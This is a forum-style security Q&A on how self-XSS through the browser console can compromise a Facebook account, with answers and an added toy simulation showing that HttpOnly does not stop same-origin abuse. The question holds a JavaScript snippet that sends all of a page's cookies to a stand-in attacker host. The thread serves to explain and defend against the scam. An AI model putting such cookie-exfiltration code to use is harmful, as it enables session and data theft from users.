I happened to open my browser console on Facebook recently and was greeted with the following message.

Stop!

This is a browser feature intended for developers. If someone told you to copy and paste something here to enable a Facebook feature or "hack" someone's account, it is a scam and will give them access to your Facebook account.

See https://www.facebook.com/selfxss for more information.

My first thought was that this was simply overkill, maybe intended to scare away those unsuspecting internet people who would blindly copy and paste some JavaScript into the console in the hopes of unlocking a secret dislike button.

But I've actually been thinking more about how you could compromise a user's session data from the JavaScript console.

I thought about a script looping over the document.cookie variable and posting all the cookie data to an API. Something similar to the below:

// Endpoint the attacker controls (placeholder; the original left apiUrl undefined).
var apiUrl = "https://attacker.example/collect";
var cookies = document.cookie.split(';');

for (var i = 0; i < cookies.length; ++i) {
    // Split only on the first '=' so values that contain '=' stay intact.
    var cookie = cookies[i].trim();
    var eq = cookie.indexOf('=');
    var name = eq === -1 ? cookie : cookie.slice(0, eq);
    var value = eq === -1 ? '' : cookie.slice(eq + 1);

    // One XMLHttpRequest per cookie: send() may only be called once per request.
    var xhr = new XMLHttpRequest();
    xhr.open("POST", apiUrl, true);
    xhr.setRequestHeader('Content-Type', 'application/json');
    xhr.send(JSON.stringify({ name: name, value: value }));
}

But my understanding is that adding the http-only flag to a cookie means it can't be accessed by JavaScript or client-side code.

So how could an attacker get you to compromise your Facebook account purely by self-XSS?

Luke

2 Answers

The warning is talking about "access to your Facebook account", not complete control.

Self-XSS works like any XSS. While you cannot read the httpOnly session cookie, you can:

  • read any data available to the attacked user (messages, secret groups, profile info, etc.)
  • send arbitrary requests in the name of the attacked user (send messages, create posts, etc.)
  • display arbitrary data to the attacked user (fake messages or posts, phishing attacks, etc.)
tim

Quoting directly from Abe Miessler's answer:

"Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user."

I would emphasize the last part of this definition: "...to a different end user."

In my mind, to qualify as an XSS attack you would need to submit a request to a website and have that site respond with the malicious content. The ways this can happen are typically broken down into two different methods:

When you convince your victim to blindly enter text into their browser console, you're basically getting them to directly execute JavaScript on their page. This isn't technically XSS, but leaving semantics aside, there are other malicious things you could do with full script-execution capabilities against a victim:

  • Create a fake login page or add your own resources (or overlays).

  • Submit posts, execute other actions on their page (like liking posts, submitting pictures, whatever)

As you've already said, setting the http-only flag on a cookie does prevent it from being accessed through the console, but that's not the only attack vector that's available once you have code execution rights.

thel3l
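Both answers make the same point: HttpOnly hides the session cookie from document.cookie, but the browser still attaches it to every same-origin request the pasted script makes, so the script can read the victim's data and post as them without ever seeing the cookie. The following is an added toy model of that behaviour (not code from the question, either answer, Facebook or any real browser). ToyBrowser, ToySite, the /me and /posts endpoints, the "sid-alice" session id and the user record are all invented for the illustration.

```javascript
// Added example: a toy model of browser cookie handling and a cookie-authenticated site.
// It is not real browser or Facebook code; it only models the rule that matters here:
// HttpOnly cookies are hidden from document.cookie but still sent on same-origin requests.

// Parse a Set-Cookie header value into { name, value, httpOnly }.
function parseSetCookie(header) {
  const parts = header.split(';').map(p => p.trim());
  const eq = parts[0].indexOf('=');
  const name = parts[0].slice(0, eq);
  const value = parts[0].slice(eq + 1);
  const httpOnly = parts.slice(1).some(attr => attr.toLowerCase() === 'httponly');
  return { name, value, httpOnly };
}

// Minimal browser: a cookie jar plus the two ways script can touch it.
class ToyBrowser {
  constructor() { this.jar = new Map(); }

  storeSetCookie(header) {
    const c = parseSetCookie(header);
    this.jar.set(c.name, c);
  }

  // What `document.cookie` returns: HttpOnly cookies are filtered out.
  documentCookie() {
    return [...this.jar.values()]
      .filter(c => !c.httpOnly)
      .map(c => `${c.name}=${c.value}`)
      .join('; ');
  }

  // What goes on the wire for a same-origin request: every cookie, HttpOnly included.
  cookieHeader() {
    return [...this.jar.values()].map(c => `${c.name}=${c.value}`).join('; ');
  }

  // A request started by page script; the browser adds the Cookie header itself.
  sameOriginRequest(server, method, path, body) {
    return server.handle({ method, path, body, cookie: this.cookieHeader() });
  }
}

// Minimal site: a session table and two endpoints behind cookie authentication.
class ToySite {
  constructor() {
    this.sessions = new Map();   // session id -> user record
    this.posts = [];             // posts created "by" logged-in users
  }

  login(browser, user) {
    const sid = 'sid-' + user.name;   // constructed, not random: a model only
    this.sessions.set(sid, user);
    browser.storeSetCookie(`session=${sid}; HttpOnly; Secure; Path=/`);
    browser.storeSetCookie(`locale=${user.locale}; Path=/`);
  }

  userFor(cookieHeader) {
    const m = /(?:^|;\s*)session=([^;]+)/.exec(cookieHeader || '');
    return m ? this.sessions.get(m[1]) : undefined;
  }

  handle(req) {
    const user = this.userFor(req.cookie);
    if (!user) return { status: 401, body: null };
    if (req.method === 'GET' && req.path === '/me') {
      return { status: 200, body: { name: user.name, email: user.email } };
    }
    if (req.method === 'POST' && req.path === '/posts') {
      this.posts.push({ author: user.name, text: req.body });
      return { status: 201, body: null };
    }
    return { status: 404, body: null };
  }
}

// The self-XSS payload as it would behave once pasted into the victim's console.
// It returns what it learned so the effect can be checked without a network.
function selfXssPayload(browser, site) {
  const stolenCookies = browser.documentCookie();                        // session cookie absent
  const me = browser.sameOriginRequest(site, 'GET', '/me');              // but this is authenticated
  browser.sameOriginRequest(site, 'POST', '/posts', 'Win a free phone'); // and so is this
  return { stolenCookies, profile: me.body };
}

// Constructed scenario: log "alice" in, then run the payload in her browser.
function demo() {
  const browser = new ToyBrowser();
  const site = new ToySite();
  site.login(browser, { name: 'alice', email: 'alice@example.com', locale: 'en' });
  return { result: selfXssPayload(browser, site), site };
}
```

In the model, document.cookie yields only `locale=en`, yet the /me request returns alice's profile and the /posts request creates a post in her name. That is exactly the gap the HttpOnly flag leaves open: it protects the cookie value, not the session.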